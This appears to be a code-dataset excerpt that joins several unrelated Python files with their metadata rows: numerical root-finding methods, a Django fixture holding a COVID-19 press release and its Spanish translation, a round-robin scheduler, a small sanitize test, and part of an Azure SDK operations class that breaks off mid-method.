                 * evaluate(function=function, variable=variable, value=fb))
    iteration_1 = 0
    if condition < 0:
        # The original duplicated the whole body for iteration 0; with
        # fa_1/fb still equal to intervals[0]/intervals[1] on the first
        # pass, the merged loop below is behaviorally identical.
        while True:
            pn_1 = (fa_1 + fb) / 2
            fn_1 = evaluate(function=function, variable=variable, value=pn_1)
            fx_1 = evaluate(function=function, variable=variable, value=fa_1) * fn_1
            iterations['a_n'].append(fa_1)
            iterations['b_n'].append(fb)
            iterations['p_n'].append(pn_1)
            iterations['f_n'].append(fn_1)
            if abs(fx_1) < tolerance:
                break
            # Keep the half interval that still brackets the sign change.
            if fx_1 < 0:
                fb = pn_1
            else:
                fa_1 = pn_1
            iteration_1 += 1
            if iteration_1 > limit:
                break
    data = DataFrame(iterations, columns=header)
    # Return the LAST recorded midpoint. The original indexed
    # p_n[iteration_1 - 1], which on a tolerance break (increment skipped)
    # pointed at the second-to-last midpoint — an off-by-one.
    return data if not just_root else iterations['p_n'][-1]
def secant(function, variable, intervals, tolerance=1e-10, limit=250, just_root=False):
    """
    Gets the root of the given expression through secant-method iterations.
    ====
    :param function: Expression to iterate
    :param variable: Expression variable
    :param intervals: Pair of starting points (x_0, x_1)
    :param tolerance: Error tolerance on |f(x_{n-1})|
    :param limit: Iteration limit; values <= 0 fall back to a hard cap of 250
    :param just_root: Switch between DataFrame and root
    :return: Return a DataFrame of the iterations if just_root is falsy,
        otherwise return the last iterate (the root approximation)
    """
    __configure__()
    iterations = {
        'x_n': [],
        'f(x_n)': []
    }
    header = ['x_n', 'f(x_n)']
    x_0 = intervals[0]
    x = intervals[1]
    n_iteration = 1
    while True:
        fx_n_1 = evaluate(function, variable, x)    # f(x_n)
        fx_n = evaluate(function, variable, x_0)    # f(x_{n-1})
        denominator = fx_n_1 - fx_n
        if denominator == 0:
            # Secant update is undefined; stop instead of dividing by zero.
            # (The original guarded this only after the first iteration.)
            break
        # Secant update: x_{n+1} = x_n - f(x_n)*(x_n - x_{n-1}) / (f(x_n) - f(x_{n-1})).
        # The original FIRST iteration computed (x - f*dx) / denom — wrong
        # parenthesization, disagreeing with every later iteration; fixed.
        x_x = x - fx_n_1 * (x - x_0) / denominator
        iterations['x_n'].append(x)
        iterations['f(x_n)'].append(fx_n)
        # Convergence is tested on f(x_{n-1}), as in the original.
        if abs(fx_n) < tolerance:
            break
        x_0 = x
        x = x_x
        n_iteration += 1
        # Honor the caller's limit when positive; always cap at 250.
        if (limit > 0 and n_iteration > limit) or n_iteration > 250:
            break
    data = DataFrame(iterations, columns=header)
    return data if not just_root else iterations['x_n'][-1]
def fixedPoint(function, variable, intervals, tolerance=1e-10, limit=250, just_root=False):
    """
    Gets the root of the given expression through iterations
    ====
    Builds the iteration map g(x) = x - f(x)/f'(x) (a Newton-type
    fixed-point map, as shown by the derive() call and the formula below)
    and iterates it until two consecutive values differ by less than
    the tolerance.

    :param function: Expression to iterate
    :param variable: Expression variable
    :param intervals: Iteration intervals (only intervals[0] is used as the seed)
    :param tolerance: Error tolerance
    :param limit: Iteration limit
    :param just_root: Switch between DataFrame and root
    :return: Return a DataFrame if just_root is not or false,
             otherwise return the root of the expression
    """
    __configure__()
    records = {
        'x_n': [],
        'f(x_n)': []
    }
    columns = ['x_n', 'f(x_n)']
    derivative = derive(function, variable)
    # Runtime string reproduced verbatim: the literal "x" is the iteration variable.
    g = "x-((%s)/(%s))" % (function, derivative)
    current = intervals[0]
    nxt = evaluate(g, variable, current)
    step = 0
    records['x_n'].append(current)
    records['f(x_n)'].append(nxt)
    gap = abs(current - nxt)
    while gap > tolerance:
        current = nxt
        nxt = evaluate(g, variable, current)
        step += 1
        records['x_n'].append(current)
        records['f(x_n)'].append(nxt)
        gap = abs(current - nxt)
        # Equivalent to the original nested checks: always stop at 250
        # iterations, and also stop past a positive caller-supplied limit.
        if step >= 250 or (0 < limit < step):
            break
    frame = DataFrame(records, columns=columns)
    if just_root:
        return records['x_n'][len(records['x_n']) - 1]
    return frame
def falsePosition(function, variable, intervals, tolerance=1e-10, limit=250, just_root=False):
    """
    Gets the root of the given expression through iterations
    ====
    :param function: Expression to iterate
    :param variable: Expression variable
    :param intervals: Iteration intervals [a, b]
    :param tolerance: Error tolerance on |f(p_n)|
    :param limit: Iteration limit (0 falls back to 250)
    :param just_root: Switch between DataFrame and root
    :return: Return a DataFrame if just_root is not or false,
             otherwise return the root of the expression

    Fixes vs. the previous version:
    - later iterations incremented the counter by 2 (vs 1 on the first
      iteration), silently halving the effective iteration limit;
    - the first iteration branched on f(x_0)*f(p_n) > 0 but both arms
      were identical, so the dead test is removed;
    - the four duplicated copies of the tolerance/update logic are merged.
    The stagnation check (stop when f(p_n) repeats exactly) is kept, and
    is now armed from the first iteration onward.
    """
    __configure__()
    x_0 = intervals[0]
    x = intervals[1]
    n_iteration = 1
    iterations = {
        'a_n': [],
        'b_n': [],
        'p_n': [],
        'f_n': []
    }
    header = ['a_n', 'b_n', 'p_n', 'f_n']
    previous_residual = None  # f(p_n) from the previous iteration (stagnation check)
    max_iterations = limit if limit != 0 else 250
    while True:
        f_b = evaluate(function, variable, x)
        f_a = evaluate(function, variable, x_0)
        # False-position point: intersection of the chord with the x axis.
        x_x = x - f_b * (x - x_0) / (f_b - f_a)
        fp_n = evaluate(function, variable, x_x)
        iterations['a_n'].append(x_0)
        iterations['b_n'].append(x)
        iterations['p_n'].append(x_x)
        iterations['f_n'].append(fp_n)
        if abs(fp_n) < tolerance or fp_n == previous_residual:
            break
        # Endpoint update as in the original: keyed on the sign of f(p_n).
        if fp_n > 0:
            x = x_x
        elif fp_n < 0:
            x_0 = x_x
        previous_residual = fp_n
        n_iteration += 1
        if n_iteration > max_iterations:
            break
    data = DataFrame(iterations, columns=header)
    return data if not just_root else iterations['p_n'][len(iterations['p_n']) - 1]
| 32.811966
| 104
| 0.452288
| 1,351
| 11,517
| 3.624722
| 0.068838
| 0.022871
| 0.017766
| 0.017153
| 0.851746
| 0.841944
| 0.818869
| 0.80049
| 0.768838
| 0.768838
| 0
| 0.035113
| 0.458453
| 11,517
| 350
| 105
| 32.905714
| 0.75004
| 0.137449
| 0
| 0.784173
| 0
| 0
| 0.025208
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.017986
| false
| 0
| 0.007194
| 0
| 0.039568
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
216f543361dddb41855bac2c6d9e52d2706c5e52
| 6,112
|
py
|
Python
|
joplin/pages/news_page/fixtures/helpers/components.py
|
cityofaustin/joplin
|
01424e46993e9b1c8e57391d6b7d9448f31d596b
|
[
"MIT"
] | 15
|
2018-09-27T07:36:30.000Z
|
2021-08-03T16:01:21.000Z
|
joplin/pages/news_page/fixtures/helpers/components.py
|
cityofaustin/joplin
|
01424e46993e9b1c8e57391d6b7d9448f31d596b
|
[
"MIT"
] | 183
|
2017-11-16T23:30:47.000Z
|
2020-12-18T21:43:36.000Z
|
joplin/pages/news_page/fixtures/helpers/components.py
|
cityofaustin/joplin
|
01424e46993e9b1c8e57391d6b7d9448f31d596b
|
[
"MIT"
] | 12
|
2017-12-12T22:48:05.000Z
|
2021-03-01T18:01:24.000Z
|
'''
components.py contains elements that may be used
interchangeably with multiple fixtures
'''
from pages.home_page.models import HomePage
def home():
    """Return the first HomePage record (``None`` when no HomePage exists,
    per Django's ``QuerySet.first`` contract)."""
    homepage_queryset = HomePage.objects
    return homepage_queryset.first()
mvp_news_title = 'Health Authorities Continue to Stress the Importance of Stay at Home & Social Distancing Guidelines'
google_translated_mvp_news_title = 'Las autoridades de salud continúan enfatizando la importancia de permanecer en el hogar y las pautas de distancia social'
mvp_news_body = '<p>Austin, TX — An individual in their 20s is in critical condition at a local hospital. Austin-Travis County Interim Health Authority, Dr. Mark Escott, continues to urge the public to stay home except for essential activities to reduce the risk of spreading COVID-19.</p><p></p><p>“The health of the public is in the hands of the community,” said Dr. Escott. “It is important to understand that young people are not immune from serious illness. We implore the community to stay at home even if you are not feeling ill, and before leaving your house ask yourself ‘Is this trip necessary?’ It is the entire community’s responsibility to stop the spread, including our young adults and teens.”</p><p></p><p>People with mild symptoms may significantly contribute to further viral spread to others–including other patients and medical staff.</p><p></p><p>“Those who only present mild symptoms may be a significant contribution to spread and therefore, everyone should stay home unless absolutely necessary,” added Dr. Escott.</p><p></p><p>If you are exhibiting COVID-19 symptoms such as fever, dry cough and shortness of breath, call your health care provider or use <a href=\"http://fake.base.url/telehealth-resources/\">telehealth resources</a> before visiting a hospital or urgent care clinic. Individuals who are uninsured or without an established provider can call the CommUnity Care COVID-19 Hotline at <a href=\"tel:512-978-8775\">512-978-8775</a> for guidance.</p><p></p><p>A healthcare provider will determine if there is another plausible diagnosis with similar symptoms (i.e. influenza). For suspected COVID-19 cases, your doctor will fill out a form. 
Austin Public Health (APH) will use this information to assess risk and criteria to determine whether a test is appropriate.</p><p></p><p>APH continues to stress the importance of practicing good personal hygiene and maintaining social distance during essential activities to disrupt the spread of the virus.</p><p></p><p>Proper hygiene practices include:</p><ul><li>Wash your hands often with soap and water for at least 20 seconds. If soap and water are unavailable, use an alcohol-based hand sanitizer.</li><li>Avoid touching your eyes, nose, and mouth with unwashed hands.</li><li>Avoid close contact with people who are sick.</li><li>Stay home when you are sick.</li><li>Cough or sneeze into your elbow or use a tissue to cover it, then throw the tissue in the trash.</li><li>Clean and disinfect frequently touched objects and surfaces.</li></ul><p>For more information and updates, visit <a href=\"http://www.AustinTexas.gov/COVID19\">www.AustinTexas.gov/COVID19</a>.</p>'
google_translated_mvp_news_body = '<p> Austin, TX - Un individuo de 20 años está en estado crítico en un hospital local. La Autoridad de Salud Provisional del Condado de Austin-Travis, Dr. Mark Escott, continúa instando al público a quedarse en casa, excepto por actividades esenciales para reducir el riesgo de propagar COVID-19. </p> <p> </p> <p> " La salud del público está en manos de la comunidad ”, dijo el Dr. Escott. “Es importante comprender que los jóvenes no son inmunes a las enfermedades graves. Implicamos a la comunidad que se quede en casa incluso si no se siente enfermo, y antes de salir de su casa pregúntese "¿Es necesario este viaje?" Es responsabilidad de toda la comunidad detener la propagación, incluidos nuestros adultos jóvenes y adolescentes ". < / p> <p> </p> <p> Las personas con síntomas leves pueden contribuir significativamente a una mayor propagación viral a otros, incluidos otros pacientes y personal médico. </p> <p> </p> <p> "Esos quienes solo presentan síntomas leves pueden ser una contribución significativa a la propagación y, por lo tanto, todos deben quedarse en casa a menos que sea absolutamente necesario ", agregó el Dr. Escott. </p> <p> </p> <p> Si está exhibiendo COVID-19 síntomas como fiebre, tos seca y falta de aliento, llame a su proveedor de atención médica o use <a href=\"http://fake.base.url/telehealth-resources/\"> recursos de telesalud </a> antes de visitar Un hospital o clínica de atención urgente. Las personas sin seguro o sin un proveedor establecido pueden llamar a la línea directa COVID-19 de CommUnity Care al <a href=\"tel:512-978-8775\"> 512-978-8775 </a> para obtener orientación. </ P > <p> </p> <p> Un proveedor de atención médica determinará si existe otro diagnóstico plausible con síntomas similares (es decir, influenza). Para casos sospechosos de COVID-19, su médico completará un formulario. 
Austin Public Health (APH) utilizará esta información para evaluar el riesgo y los criterios para determinar si una prueba es apropiada. </p> <p> </p> <p> APH continúa enfatizando la importancia de practicar una buena higiene personal y mantener distancia social durante las actividades esenciales para interrumpir la propagación del virus. </p> <p> </p> <p> Las prácticas de higiene adecuadas incluyen: </p> <ul> <li> Lávese las manos a menudo con agua y jabón por al menos 20 segundos. Si no hay agua y jabón disponibles, use un desinfectante para manos a base de alcohol. </li> <li> Evite tocarse los ojos, la nariz y la boca con las manos sin lavar. </li> <li> Evite el contacto cercano con personas enfermas . </li> <li> Quédese en casa cuando esté enfermo. </li> <li> Tosa o estornude en su codo o use un pañuelo para cubrirlo, luego tírelo a la basura. </li> <li > Limpie y desinfecte objetos y superficies que se tocan con frecuencia. </li> </ul> <p> Para obtener más información y actualizaciones, visite <a href=\"http://www.AustinTexas.gov/COVID19\"> www. AustinTexas.gov/COVID19 </a>. </p>'
| 359.529412
| 2,977
| 0.771597
| 1,008
| 6,112
| 4.668651
| 0.441468
| 0.01785
| 0.01785
| 0.0119
| 0.092223
| 0.073523
| 0.055249
| 0.055249
| 0.055249
| 0.037399
| 0
| 0.013825
| 0.147906
| 6,112
| 16
| 2,978
| 382
| 0.889209
| 0.014234
| 0
| 0
| 0
| 0.285714
| 0.96488
| 0.05759
| 0
| 0
| 0
| 0
| 0
| 1
| 0.142857
| false
| 0
| 0.714286
| 0.142857
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
21e18e5f0f861c7c99e9293a25b257de7375254d
| 181
|
py
|
Python
|
azure_automation_utility/__init__.py
|
WenJason/azure_automation_utility-master
|
13a95240907bd3d970ea382c1181d7de21c0ec91
|
[
"MIT"
] | 8
|
2018-09-14T08:05:51.000Z
|
2022-02-10T16:33:27.000Z
|
azure_automation_utility/__init__.py
|
WenJason/azure_automation_utility-master
|
13a95240907bd3d970ea382c1181d7de21c0ec91
|
[
"MIT"
] | 1
|
2019-10-04T18:32:15.000Z
|
2019-10-04T18:41:16.000Z
|
azure_automation_utility/__init__.py
|
WenJason/azure_automation_utility-master
|
13a95240907bd3d970ea382c1181d7de21c0ec91
|
[
"MIT"
] | 11
|
2018-09-10T15:12:43.000Z
|
2022-02-10T16:33:30.000Z
|
from .utility import get_automation_runas_credential
from .utility import get_automation_runas_token
from .utility import import_child_runbook
from .utility import load_webhook_body
| 45.25
| 52
| 0.895028
| 26
| 181
| 5.846154
| 0.5
| 0.289474
| 0.447368
| 0.263158
| 0.460526
| 0.460526
| 0
| 0
| 0
| 0
| 0
| 0
| 0.082873
| 181
| 4
| 53
| 45.25
| 0.915663
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
df109681beb2d2df59774904bd2fdc564f8d9b94
| 3,434
|
py
|
Python
|
src/rr.py
|
hrithikbhat019/OS-Simulation
|
76521b130c41aae3ba157b3f07e54f7db4ab374d
|
[
"MIT"
] | null | null | null |
src/rr.py
|
hrithikbhat019/OS-Simulation
|
76521b130c41aae3ba157b3f07e54f7db4ab374d
|
[
"MIT"
] | null | null | null |
src/rr.py
|
hrithikbhat019/OS-Simulation
|
76521b130c41aae3ba157b3f07e54f7db4ab374d
|
[
"MIT"
] | 1
|
2020-05-28T05:53:36.000Z
|
2020-05-28T05:53:36.000Z
|
# NOTE(review): this region contained an unresolved merge conflict whose two
# sides were byte-identical; it is resolved here to the single shared version.
from queue import Queue
from operator import itemgetter


def rr(data, tq=2, n=None):
    """Simulate Round Robin CPU scheduling.

    Fixes vs. the previous version:
    - ``n`` and ``tq`` were free (undefined) names causing a NameError;
      they are now parameters (``n`` defaults to ``len(data)``);
    - Python 2 ``print`` statements converted to ``print()`` calls;
    - waiting time was computed from the already-zeroed remaining burst
      (``wt = tat - bt`` after ``bt = 0``), so it always equalled the
      turnaround time; the original burst is now recorded up front;
    - the simulation result is now returned instead of only printed.

    :param data: list of process dicts with keys 'no' (id), 'at' (arrival
                 time) and 'bt' (burst time); the dicts are mutated in place
                 ('bt' is consumed; 'ct', 'tat', 'wt' are added).
    :param tq: time quantum (default 2).
    :param n: number of processes; defaults to len(data).
    :return: dict with 'table' (sorted process list), 'gantt' (chart entries
             {'no', 'start', 'stop'}, no == -1 for idle time), 'avg_tat'
             and 'avg_wt'.
    """
    if n is None:
        n = len(data)
    process = {'table': data, 'gantt': []}
    ready = Queue(maxsize=50)
    time = 0
    left = n
    a_tat = 0.0
    a_wt = 0.0
    process['table'] = sorted(process['table'], key=itemgetter('at'))
    # Remember the original burst of each process: 'bt' is consumed below,
    # but waiting time must be computed against the full burst.
    original_burst = {p['no']: p['bt'] for p in process['table']}
    time = process['table'][0]['at']
    for x in process['table']:
        if x['at'] == time:
            ready.put(x)
    while left != 0:
        flag = 0
        prev = time
        available = not ready.empty()
        if available:
            temp = ready.get()
            gtemp = {'no': temp['no']}
            if temp['bt'] <= tq:
                # Process finishes within this quantum.
                gtemp['start'] = time
                time += temp['bt']
                gtemp['stop'] = time
                temp['bt'] = 0
                flag = 1
            else:
                # Consume one quantum and keep the remainder.
                temp['bt'] -= tq
                gtemp['start'] = time
                time += tq
                gtemp['stop'] = time
            process['gantt'].append(gtemp)
        else:
            # CPU idle: advance one tick and mark it with no == -1.
            process['gantt'].append({'no': -1, 'start': time, 'stop': time + 1})
            time += 1
        # Enqueue processes that arrived during this slice.
        for proc in process['table']:
            if prev < proc['at'] <= time:
                ready.put(proc)
        if flag == 1:
            left -= 1
            temp['ct'] = time
            temp['tat'] = temp['ct'] - temp['at']
            temp['wt'] = temp['tat'] - original_burst[temp['no']]
            a_tat += temp['tat']
            a_wt += temp['wt']
            print('Process %d has completed at time %d' % (temp['no'], time))
        elif available:
            # Preempted: rotate back to the tail of the ready queue.
            ready.put(temp)
    process['avg_tat'] = a_tat / n
    process['avg_wt'] = a_wt / n
    print(process['gantt'])
    return process
| 27.253968
| 81
| 0.415842
| 390
| 3,434
| 3.641026
| 0.141026
| 0.101408
| 0.039437
| 0.04507
| 0.969014
| 0.969014
| 0.969014
| 0.969014
| 0.969014
| 0.969014
| 0
| 0.031611
| 0.419627
| 3,434
| 125
| 82
| 27.472
| 0.680883
| 0.013395
| 0
| 0.972973
| 0
| 0
| 0.093972
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.036036
| null | null | 0.036036
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
80370c255bedf0f3e4f774519e6467240602f1e6
| 228
|
py
|
Python
|
tests/test_utils.py
|
123joshuawu/orca
|
741856dc264ffd38a7de8c2da1847543fd8c84d1
|
[
"0BSD"
] | 6
|
2020-12-09T01:53:40.000Z
|
2021-04-12T16:05:45.000Z
|
tests/test_utils.py
|
123joshuawu/orca
|
741856dc264ffd38a7de8c2da1847543fd8c84d1
|
[
"0BSD"
] | 13
|
2020-12-04T20:42:33.000Z
|
2021-04-17T20:15:11.000Z
|
tests/test_utils.py
|
123joshuawu/orca
|
741856dc264ffd38a7de8c2da1847543fd8c84d1
|
[
"0BSD"
] | 1
|
2020-12-28T01:31:28.000Z
|
2020-12-28T01:31:28.000Z
|
from api.parser.utils import sanitize
def test_sanitize():
    """sanitize strips surrounding whitespace and, per the third case,
    turns internal whitespace characters (tab/newline) into single spaces."""
    assert sanitize("hello world") == "hello world"
    assert sanitize(" hello world ") == "hello world"
    assert sanitize(" \thello\nworld ") == "hello world"
| 38
| 58
| 0.666667
| 27
| 228
| 5.592593
| 0.481481
| 0.331126
| 0.251656
| 0.317881
| 0.543046
| 0.543046
| 0.543046
| 0.543046
| 0
| 0
| 0
| 0
| 0.197368
| 228
| 6
| 59
| 38
| 0.825137
| 0
| 0
| 0.4
| 0
| 0
| 0.344978
| 0
| 0
| 0
| 0
| 0
| 0.6
| 1
| 0.2
| true
| 0
| 0.2
| 0
| 0.4
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
80456fe9eea88e562e4847a02e9a13bd6d61e996
| 122,866
|
py
|
Python
|
azure-mgmt-web/azure/mgmt/web/operations/hosting_environments_operations.py
|
HydAu/AzureSDKForPython
|
5cbe34e9e0b8ea1faacc9f205633ccc0b885c0f3
|
[
"Apache-2.0"
] | null | null | null |
azure-mgmt-web/azure/mgmt/web/operations/hosting_environments_operations.py
|
HydAu/AzureSDKForPython
|
5cbe34e9e0b8ea1faacc9f205633ccc0b885c0f3
|
[
"Apache-2.0"
] | null | null | null |
azure-mgmt-web/azure/mgmt/web/operations/hosting_environments_operations.py
|
HydAu/AzureSDKForPython
|
5cbe34e9e0b8ea1faacc9f205633ccc0b885c0f3
|
[
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft and contributors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.pipeline import ClientRawResponse
from msrestazure.azure_exceptions import CloudError
from msrestazure.azure_operation import AzureOperationPoller
import uuid
from .. import models
class HostingEnvironmentsOperations(object):
"""HostingEnvironmentsOperations operations.
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
    :param deserializer: An object model deserializer.
"""
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self.config = config
    def get_hosting_environment(
            self, resource_group_name, name, custom_headers=None, raw=False, **operation_config):
        """
        Get properties of hostingEnvironment (App Service Environment).
        :param resource_group_name: Name of resource group
        :type resource_group_name: str
        :param name: Name of hostingEnvironment (App Service Environment)
        :type name: str
        :param dict custom_headers: headers that will be added to the request
        :param bool raw: returns the direct response alongside the
         deserialized response
        :param operation_config: :ref:`Operation configuration
         overrides<msrest:optionsforoperations>`.
        :rtype: :class:`HostingEnvironment
         <azure.mgmt.web.models.HostingEnvironment>`, or
         :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
         if raw=true
        :raises: CloudError on any status code other than 200
        """
        # Construct URL
        url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}'
        path_format_arguments = {
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'name': self._serialize.url("name", name, 'str'),
            'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
        }
        url = self._client.format_url(url, **path_format_arguments)
        # Construct parameters
        query_parameters = {}
        query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
        # Construct headers
        header_parameters = {}
        header_parameters['Content-Type'] = 'application/json; charset=utf-8'
        if self.config.generate_client_request_id:
            # uuid1 gives a per-call x-ms-client-request-id for request correlation
            header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
        if custom_headers:
            header_parameters.update(custom_headers)
        if self.config.accept_language is not None:
            header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
        # Construct and send request
        request = self._client.get(url, query_parameters)
        response = self._client.send(request, header_parameters, **operation_config)
        if response.status_code not in [200]:
            # Non-200: raise CloudError tagged with the service request id
            exp = CloudError(response)
            exp.request_id = response.headers.get('x-ms-request-id')
            raise exp
        deserialized = None
        if response.status_code == 200:
            deserialized = self._deserialize('HostingEnvironment', response)
        if raw:
            client_raw_response = ClientRawResponse(deserialized, response)
            return client_raw_response
        return deserialized
    def create_or_update_hosting_environment(
            self, resource_group_name, name, hosting_environment_envelope, custom_headers=None, raw=False, **operation_config):
        """
        Create or update a hostingEnvironment (App Service Environment).
        This is a long-running operation driven through an
        AzureOperationPoller unless raw=True.
        :param resource_group_name: Name of resource group
        :type resource_group_name: str
        :param name: Name of hostingEnvironment (App Service Environment)
        :type name: str
        :param hosting_environment_envelope: Properties of hostingEnvironment
         (App Service Environment)
        :type hosting_environment_envelope: :class:`HostingEnvironment
         <azure.mgmt.web.models.HostingEnvironment>`
        :param dict custom_headers: headers that will be added to the request
        :param bool raw: returns the direct response alongside the
         deserialized response
        :rtype:
         :class:`AzureOperationPoller<msrestazure.azure_operation.AzureOperationPoller>`
         instance that returns :class:`HostingEnvironment
         <azure.mgmt.web.models.HostingEnvironment>`, or
         :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
         if raw=true
        """
        # Construct URL
        url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}'
        path_format_arguments = {
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'name': self._serialize.url("name", name, 'str'),
            'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
        }
        url = self._client.format_url(url, **path_format_arguments)
        # Construct parameters
        query_parameters = {}
        query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
        # Construct headers
        header_parameters = {}
        header_parameters['Content-Type'] = 'application/json; charset=utf-8'
        if self.config.generate_client_request_id:
            header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
        if custom_headers:
            header_parameters.update(custom_headers)
        if self.config.accept_language is not None:
            header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
        # Construct body
        body_content = self._serialize.body(hosting_environment_envelope, 'HostingEnvironment')
        # Construct and send request
        def long_running_send():
            # Initial PUT that starts the long-running operation.
            request = self._client.put(url, query_parameters)
            return self._client.send(
                request, header_parameters, body_content, **operation_config)
        def get_long_running_status(status_link, headers=None):
            # Poll the status URL handed back by the service.
            request = self._client.get(status_link)
            if headers:
                request.headers.update(headers)
            return self._client.send(
                request, header_parameters, **operation_config)
        def get_long_running_output(response):
            # 400/404/409 are accepted without raising here (deserialized
            # stays None); only 200/202 carry a HostingEnvironment payload.
            if response.status_code not in [200, 202, 400, 404, 409]:
                exp = CloudError(response)
                exp.request_id = response.headers.get('x-ms-request-id')
                raise exp
            deserialized = None
            if response.status_code == 200:
                deserialized = self._deserialize('HostingEnvironment', response)
            if response.status_code == 202:
                deserialized = self._deserialize('HostingEnvironment', response)
            if raw:
                client_raw_response = ClientRawResponse(deserialized, response)
                return client_raw_response
            return deserialized
        if raw:
            # raw=True skips polling: send once and wrap the first response.
            response = long_running_send()
            return get_long_running_output(response)
        long_running_operation_timeout = operation_config.get(
            'long_running_operation_timeout',
            self.config.long_running_operation_timeout)
        return AzureOperationPoller(
            long_running_send, get_long_running_output,
            get_long_running_status, long_running_operation_timeout)
    def delete_hosting_environment(
            self, resource_group_name, name, force_delete=None, custom_headers=None, raw=False, **operation_config):
        """
        Delete a hostingEnvironment (App Service Environment).
        This is a long-running operation driven through an
        AzureOperationPoller unless raw=True.
        :param resource_group_name: Name of resource group
        :type resource_group_name: str
        :param name: Name of hostingEnvironment (App Service Environment)
        :type name: str
        :param force_delete: Delete even if the hostingEnvironment (App
         Service Environment) contains resources
        :type force_delete: bool
        :param dict custom_headers: headers that will be added to the request
        :param bool raw: returns the direct response alongside the
         deserialized response
        :rtype:
         :class:`AzureOperationPoller<msrestazure.azure_operation.AzureOperationPoller>`
         instance that returns object, or
         :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
         if raw=true
        """
        # Construct URL
        url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}'
        path_format_arguments = {
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'name': self._serialize.url("name", name, 'str'),
            'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
        }
        url = self._client.format_url(url, **path_format_arguments)
        # Construct parameters
        query_parameters = {}
        if force_delete is not None:
            # forceDelete is only sent when explicitly requested by the caller
            query_parameters['forceDelete'] = self._serialize.query("force_delete", force_delete, 'bool')
        query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
        # Construct headers
        header_parameters = {}
        header_parameters['Content-Type'] = 'application/json; charset=utf-8'
        if self.config.generate_client_request_id:
            header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
        if custom_headers:
            header_parameters.update(custom_headers)
        if self.config.accept_language is not None:
            header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
        # Construct and send request
        def long_running_send():
            # Initial DELETE that starts the long-running operation.
            request = self._client.delete(url, query_parameters)
            return self._client.send(request, header_parameters, **operation_config)
        def get_long_running_status(status_link, headers=None):
            # Poll the status URL handed back by the service.
            request = self._client.get(status_link)
            if headers:
                request.headers.update(headers)
            return self._client.send(
                request, header_parameters, **operation_config)
        def get_long_running_output(response):
            # 400/404/409 are accepted without raising here (deserialized
            # stays None); 200/202 payloads are deserialized as plain objects.
            if response.status_code not in [200, 202, 400, 404, 409]:
                exp = CloudError(response)
                exp.request_id = response.headers.get('x-ms-request-id')
                raise exp
